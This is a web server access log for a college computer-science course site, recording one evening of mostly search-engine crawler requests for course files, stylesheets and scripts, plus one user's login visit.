185.191.171.40 - - [09/May/2021:18:05:15 -0500] "GET /JimMartinson/CST1025/Resources/Software/1)%20Troubleshooting%20tools/7%20Best%20Tools%20to%20Troubleshoot%20Network%20Issues.URL HTTP/1.1" 499 0 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.40 - - [09/May/2021:18:06:05 -0500] "GET /JimMartinson/CST1025/Resources/Software/1)%20Troubleshooting%20tools/7%20Best%20Tools%20to%20Troubleshoot%20Network%20Issues.URL HTTP/1.1" 499 0 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
207.46.13.61 - - [09/May/2021:18:07:17 -0500] "GET /jeffpolman/CST2840/resources/Wireless%20LAN%20Book/Answers%20to%20exercises/LabManualSolutions/Ch07.doc HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.61 - - [09/May/2021:18:07:17 -0500] "GET /Credentials/2000-01/?C=S;O=D HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
35.185.207.84 - - [09/May/2021:18:12:24 -0500] "GET /jeffpolman/MMDT1001/resources/Lab%207.1%20Laptop%20Properties.rtf HTTP/1.1" 301 185 "-" "Go-http-client/1.1"
35.185.207.84 - - [09/May/2021:18:12:24 -0500] "GET /jeffpolman/MMDT1001/resources/Lab%207.1%20Laptop%20Properties.rtf HTTP/1.1" 404 169 "http://www.cst.ridgewater.edu/jeffpolman/MMDT1001/resources/Lab%207.1%20Laptop%20Properties.rtf" "Go-http-client/1.1"
207.46.13.98 - - [09/May/2021:18:18:05 -0500] "GET /JimMartinson/CST1025/Resources/ComputerNetworks/auxiliary_files/mininet/loadbalancepox.py HTTP/1.1" 200 7720 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.98 - - [09/May/2021:18:29:54 -0500] "GET /JimMartinson/CST1025/Resources/ComputerNetworks/auxiliary_files/mininet/loadbalancepox.py HTTP/1.1" 200 7720 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
23.129.64.237 - - [09/May/2021:18:30:56 -0500] "GET / HTTP/1.1" 200 12396 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
114.119.130.251 - - [09/May/2021:18:33:25 -0500] "GET /AdobeConnect HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.130.251 - - [09/May/2021:18:33:31 -0500] "GET /AdobeConnect HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.130.251 - - [09/May/2021:18:33:33 -0500] "GET /AdobeConnect/ HTTP/1.1" 200 7981 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.79.146 - - [09/May/2021:18:35:40 -0500] "GET / HTTP/1.1" 200 12396 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.146 - - [09/May/2021:18:35:43 -0500] "GET /css/debug.css?datetime=20210509183540 HTTP/1.1" 200 17 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.144 - - [09/May/2021:18:35:44 -0500] "GET /js/div.js?i&datetime=20210509183540 HTTP/1.1" 200 7433 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.146 - - [09/May/2021:18:35:44 -0500] "GET /js/tooltip.js?o&datetime=20210509183540 HTTP/1.1" 200 13888 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.146 - - [09/May/2021:18:35:45 -0500] "GET /js/CST.js?S&datetime=20210509183540 HTTP/1.1" 200 12049 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.146 - - [09/May/2021:18:35:45 -0500] "GET /js/CollapsibleLists.js?o&datetime=20210509183540 HTTP/1.1" 200 1018 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.146 - - [09/May/2021:18:35:46 -0500] "GET /css/CST.css?datetime=20210509183540 HTTP/1.1" 200 24467 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.146 - - [09/May/2021:18:35:46 -0500] "GET /css/tooltip.css?datetime=20210509183540 HTTP/1.1" 200 2300 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.146 - - [09/May/2021:18:35:47 -0500] "GET /js/debug.js?e&datetime=20210509183540 HTTP/1.1" 200 10964 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
40.77.167.98 - - [09/May/2021:18:40:46 -0500] "GET /css/printing.css?datetime=20210505121514 HTTP/1.1" 200 5910 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
175.147.107.4 - - [09/May/2021:18:42:18 -0500] "GET /JimMartinson/CST1600/Resources/Database-Design-2nd-Edition-1420760605.pdf HTTP/1.1" 301 185 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
175.147.107.4 - - [09/May/2021:18:42:19 -0500] "GET /JimMartinson/CST1600/Resources/Database-Design-2nd-Edition-1420760605.pdf HTTP/1.1" 200 2983395 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
175.147.107.4 - - [09/May/2021:18:42:21 -0500] "GET /JimMartinson/CST1600/Resources/Database-Design-2nd-Edition-1420760605.pdf HTTP/1.1" 200 2424581 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
207.46.13.102 - - [09/May/2021:18:45:36 -0500] "GET /jeffpolman/CST1701/resources/fall2011.webex.recordings/Lab%201.5.2.wrf HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
162.62.123.46 - - [09/May/2021:18:46:34 -0500] "GET / HTTP/1.1" 200 12396 "-" "-"
162.62.123.46 - - [09/May/2021:18:46:47 -0500] "GET / HTTP/1.0" 200 12369 "-" "-"
162.62.123.46 - - [09/May/2021:18:47:10 -0500] "OPTIONS / HTTP/1.0" 405 173 "-" "-"
207.46.13.61 - - [09/May/2021:18:47:49 -0500] "GET /jeffpolman/CST2840/resources/Wireless%20LAN%20Book/Answers%20to%20exercises/LabManualSolutions/Ch07.doc HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.61 - - [09/May/2021:18:47:51 -0500] "GET /js/cst.js?s&datetime=20210507143012 HTTP/1.1" 200 12049 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
66.249.79.148 - - [09/May/2021:18:48:46 -0500] "GET /JimMartinson/MMDT2146/Notes/ HTTP/1.1" 200 218 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.97 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
40.77.167.88 - - [09/May/2021:18:49:24 -0500] "GET /robots.txt HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.102 - - [09/May/2021:18:54:13 -0500] "GET /JimMartinson/CST1600/?Assignments HTTP/1.1" 200 7158 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.70 - - [09/May/2021:19:01:04 -0500] "GET /jeffpolman/CST1700/resources/Spring2013WebExRecordings/Chapter1.wrf HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.70 - - [09/May/2021:19:01:04 -0500] "GET /JeffPolman/CST2514/resources/Vista%20Print%20Schemes.docx HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
114.119.153.220 - - [09/May/2021:19:01:44 -0500] "GET /JimMartinson/CST1025/Resources/ComputerNetworks/preface.html HTTP/1.1" 200 36778 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
40.77.189.142 - - [09/May/2021:19:06:18 -0500] "GET /js/CollapsibleLists.js?o&datetime=20210505121514 HTTP/1.1" 200 1018 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
40.77.189.142 - - [09/May/2021:19:06:18 -0500] "GET /js/CST.js?S&datetime=20210505121514 HTTP/1.1" 200 12049 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
40.77.189.142 - - [09/May/2021:19:06:18 -0500] "GET /css/CST.css?datetime=20210505121514 HTTP/1.1" 200 24467 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
40.77.189.142 - - [09/May/2021:19:06:18 -0500] "GET /js/openCenteredWindow.js?p&datetime=20210505121514 HTTP/1.1" 200 3771 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
40.77.189.142 - - [09/May/2021:19:06:18 -0500] "GET /js/div.js?i&datetime=20210505121514 HTTP/1.1" 200 7433 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
123.189.93.75 - - [09/May/2021:19:09:22 -0500] "GET /JimMartinson/CST1600/Resources/Database-Design-2nd-Edition-1420760605.pdf HTTP/1.1" 200 2113285 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
114.119.146.61 - - [09/May/2021:19:30:33 -0500] "GET /JimMartinson/CST2505/Syllabus.php HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
52.30.55.29 - - [09/May/2021:19:34:14 -0500] "GET /jeffpolman/CST2702/resources/en_ESwitching_SPTM_v4030%5B1%5D.pdf HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
52.30.55.29 - - [09/May/2021:19:34:15 -0500] "GET /jeffpolman/CST2702/resources/en_ESwitching_SPTM_v4030%5B1%5D.pdf HTTP/1.1" 404 571 "http://cst.ridgewater.edu/jeffpolman/CST2702/resources/en_ESwitching_SPTM_v4030%5B1%5D.pdf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
40.77.167.100 - - [09/May/2021:19:35:23 -0500] "GET /js/collapsiblelists.js?o&datetime=20210323123804 HTTP/1.1" 200 1018 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
66.249.79.148 - - [09/May/2021:19:36:26 -0500] "GET / HTTP/1.1" 200 12396 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
40.77.167.98 - - [09/May/2021:19:57:22 -0500] "GET /jeffpolman/MMDT1001/resources/presentations/Chapter13.pptx HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.70 - - [09/May/2021:20:08:16 -0500] "GET /JimMartinson/CST1025/Resources/ComputerNetworks/auxiliary_files/mininet/rip.py HTTP/1.1" 200 11690 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.70 - - [09/May/2021:20:08:18 -0500] "GET /JimMartinson/CST1025/Resources/ComputerNetworks/auxiliary_files/mininet/dualreceive.py HTTP/1.1" 200 3114 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
114.119.155.150 - - [09/May/2021:20:13:58 -0500] "GET /Zoom HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
158.69.170.60 - - [09/May/2021:20:18:10 -0500] "GET /wp-content/plugins/iva-business-hours-pro/assets/fontello/LICENSE.txt HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36"
159.69.117.169 - - [09/May/2021:20:20:53 -0500] "GET / HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; Seekport Crawler; http://seekport.com/)"
202.39.54.2 - - [09/May/2021:20:23:28 -0500] "GET / HTTP/1.1" 301 185 "-" "-"
207.46.13.102 - - [09/May/2021:20:25:16 -0500] "GET /Credentials/1997-98/?C=M;O=D HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.102 - - [09/May/2021:20:25:31 -0500] "GET /jeffpolman/CST1701/resources/1701%20for%20students/presentations/OSPF.ppt HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.149 - - [09/May/2021:20:29:41 -0500] "GET /jeffpolman/CST2702/resources/1702%20for%20students/CST2702%20Lab%20Checkoff%20sheet%20Packet%20tracer%20version.doc HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.79.146 - - [09/May/2021:20:29:46 -0500] "GET / HTTP/1.1" 200 12396 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.146 - - [09/May/2021:20:29:48 -0500] "GET /js/CollapsibleLists.js?o&datetime=20210509202945 HTTP/1.1" 200 1018 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.148 - - [09/May/2021:20:29:48 -0500] "GET /js/CST.js?S&datetime=20210509202945 HTTP/1.1" 200 12049 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.146 - - [09/May/2021:20:29:49 -0500] "GET /css/tooltip.css?datetime=20210509202945 HTTP/1.1" 200 2300 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.144 - - [09/May/2021:20:29:49 -0500] "GET /js/div.js?i&datetime=20210509202945 HTTP/1.1" 200 7433 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.146 - - [09/May/2021:20:29:50 -0500] "GET /css/debug.css?datetime=20210509202945 HTTP/1.1" 200 17 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.144 - - [09/May/2021:20:29:50 -0500] "GET /js/tooltip.js?o&datetime=20210509202945 HTTP/1.1" 200 13888 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.146 - - [09/May/2021:20:29:51 -0500] "GET /css/CST.css?datetime=20210509202945 HTTP/1.1" 200 24467 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.144 - - [09/May/2021:20:29:51 -0500] "GET /js/debug.js?e&datetime=20210509202945 HTTP/1.1" 200 10964 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
183.136.225.14 - - [09/May/2021:20:39:02 -0500] "GET / HTTP/1.1" 200 12397 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
183.136.225.14 - - [09/May/2021:20:39:04 -0500] "GET / HTTP/1.1" 200 12397 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.14 - - [09/May/2021:20:39:05 -0500] "GET /favicon.ico HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
207.46.13.61 - - [09/May/2021:20:41:02 -0500] "GET /Credentials/2013-14/Network%20Systems%20Administration%20-%20AAS%20Degree%20%282013-2014%29%20Hutchinson%20and%20Willmar%20%2863%A0Credits%29%20-%20Education%20Plan.htm HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.61 - - [09/May/2021:20:41:05 -0500] "GET /Course/?Course=MATH109 HTTP/1.1" 200 5475 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
69.71.40.22 - - [09/May/2021:20:42:05 -0500] "GET /JimMartinson/ HTTP/1.1" 200 11442 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:05 -0500] "GET /css/CST.css?datetime=20210509204205 HTTP/1.1" 200 24467 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:05 -0500] "GET /css/debug.css?datetime=20210509204205 HTTP/1.1" 200 17 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:05 -0500] "GET /css/tooltip.css?datetime=20210509204205 HTTP/1.1" 200 2300 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:05 -0500] "GET /js/CST.js?S&datetime=20210509204205 HTTP/1.1" 200 12049 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:05 -0500] "GET /js/debug.js?e&datetime=20210509204205 HTTP/1.1" 200 10964 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:05 -0500] "GET /js/div.js?i&datetime=20210509204205 HTTP/1.1" 200 7433 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:05 -0500] "GET /js/CollapsibleLists.js?o&datetime=20210509204205 HTTP/1.1" 200 1018 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:05 -0500] "GET /js/tooltip.js?o&datetime=20210509204205 HTTP/1.1" 200 13888 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:06 -0500] "GET /login HTTP/1.1" 301 185 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:07 -0500] "GET /login/ HTTP/1.1" 200 7094 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:07 -0500] "GET /css/CST.css?datetime=20210509204207 HTTP/1.1" 200 24467 "https://cst.ridgewater.edu/login/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:07 -0500] "GET /js/CollapsibleLists.js?o&datetime=20210509204207 HTTP/1.1" 200 1018 "https://cst.ridgewater.edu/login/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:07 -0500] "GET /js/div.js?i&datetime=20210509204207 HTTP/1.1" 200 7433 "https://cst.ridgewater.edu/login/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:07 -0500] "GET /js/CST.js?S&datetime=20210509204207 HTTP/1.1" 200 12049 "https://cst.ridgewater.edu/login/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:07 -0500] "GET /css/tooltip.css?datetime=20210509204207 HTTP/1.1" 200 2300 "https://cst.ridgewater.edu/login/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:07 -0500] "GET /css/debug.css?datetime=20210509204207 HTTP/1.1" 200 17 "https://cst.ridgewater.edu/login/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:07 -0500] "GET /js/debug.js?e&datetime=20210509204207 HTTP/1.1" 200 10964 "https://cst.ridgewater.edu/login/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:07 -0500] "GET /js/tooltip.js?o&datetime=20210509204207 HTTP/1.1" 200 13888 "https://cst.ridgewater.edu/login/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:07 -0500] "GET /js/encode.js?n&datetime=20210509204207 HTTP/1.1" 200 2957 "https://cst.ridgewater.edu/login/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:08 -0500] "POST /Login/ HTTP/1.1" 200 393 "https://cst.ridgewater.edu/login/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:08 -0500] "POST /JimMartinson/ HTTP/1.1" 200 12376 "https://cst.ridgewater.edu/Login/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:08 -0500] "GET /css/CST.css?datetime=20210509204208 HTTP/1.1" 200 24467 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:08 -0500] "GET /css/debug.css?datetime=20210509204208 HTTP/1.1" 200 17 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:08 -0500] "GET /js/div.js?i&datetime=20210509204208 HTTP/1.1" 200 7433 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:08 -0500] "GET /js/CST.js?S&datetime=20210509204208 HTTP/1.1" 200 12049 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:08 -0500] "GET /css/tooltip.css?datetime=20210509204208 HTTP/1.1" 200 2300 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:08 -0500] "GET /js/CollapsibleLists.js?o&datetime=20210509204208 HTTP/1.1" 200 1018 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:08 -0500] "GET /js/debug.js?e&datetime=20210509204208 HTTP/1.1" 200 10964 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:20:42:08 -0500] "GET /js/tooltip.js?o&datetime=20210509204208 HTTP/1.1" 200 13888 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
64.62.197.2 - - [09/May/2021:20:42:31 -0500] "GET / HTTP/1.1" 200 12394 "-" "-"
114.119.140.153 - - [09/May/2021:20:43:43 -0500] "GET /RockyHyberger HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.140.153 - - [09/May/2021:20:43:45 -0500] "GET /RockyHyberger HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
